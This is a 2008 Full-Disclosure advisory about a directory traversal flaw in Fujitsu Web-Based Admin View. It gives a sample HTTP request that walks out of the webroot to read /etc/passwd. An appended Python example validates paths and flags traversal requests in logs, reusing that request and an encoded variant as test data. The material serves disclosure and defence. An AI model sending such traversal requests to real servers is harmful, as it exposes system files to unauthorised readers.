Full Disclosure: Fujitsu Web-Based Admin View Directory Traversal Vulnerability

From: Deniz Cevik <Deniz.Cevik_at_intellect.com.tr>
Date: Thu, 21 Aug 2008 16:34:00 +0300

Fujitsu Web-Based Admin View Directory Traversal Vulnerability

Version: 2.1.2 on Solaris; other versions may be vulnerable

Vulnerability: Directory Traversal

Risk: Critical

Description: Due to insufficient control of user inputs, Fujitsu
Web-based admin view reveals content of files residing in folders other
than webroot. This will allow an attacker to view arbitrary local files
within the context of the web server.

Sample Request:

GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0
Host: target:8081

Deniz CEVIK

www.intellectpro.com.tr

 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Received on Aug 21 2008
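
Added example (not part of the original post and not Fujitsu's code): a server-side check of the kind the description says was missing, which resolves dot segments before mapping a request to a file, plus the same test applied to request lines for detection. The webroot path, the function names and every sample line except the advisory's own request are assumptions constructed for illustration.

```python
import posixpath
from urllib.parse import unquote

WEBROOT = "/opt/app/webroot"  # assumed document root, not taken from the advisory

def _url_path(request_target):
    """Strip the query string, percent-decode once, normalise backslashes."""
    return unquote(request_target.split("?", 1)[0]).replace("\\", "/")

def escapes_webroot(request_target):
    """True if the path climbs above the root once '.' and '..' are resolved."""
    depth = 0
    for segment in _url_path(request_target).split("/"):
        if segment in ("", "."):
            continue              # '/./' and '//' do not change depth
        if segment == "..":
            depth -= 1
            if depth < 0:         # stepped above the root at some point
                return True
        else:
            depth += 1
    return False

def resolve(request_target, webroot=WEBROOT):
    """Map a request target to a file path, or raise PermissionError."""
    if escapes_webroot(request_target):
        raise PermissionError("path traversal rejected")
    joined = posixpath.join(webroot, _url_path(request_target).lstrip("/"))
    full = posixpath.normpath(joined)
    # Defence in depth: the lexical result must still sit under the webroot.
    # Symlinks are not followed here; a real server should also compare
    # os.path.realpath() results before opening the file.
    if full != webroot and not full.startswith(webroot + "/"):
        raise PermissionError("resolved path outside webroot")
    return full

SAMPLE_REQUEST_LINES = [  # first line is the advisory's request, rest constructed
    "GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0",
    "GET /index.html HTTP/1.0",
    "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.0",
    "GET /help/../index.html?x=../ HTTP/1.0",
]

def flag_requests(lines):
    """Return request lines whose target escapes the webroot (for log review)."""
    flagged = []
    for line in lines:
        parts = line.split()
        if len(parts) == 3 and escapes_webroot(parts[1]):
            flagged.append(line)
    return flagged
```

The mixed `.././` segments in the sample request are why the check counts path depth instead of searching for a fixed `../../` substring.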
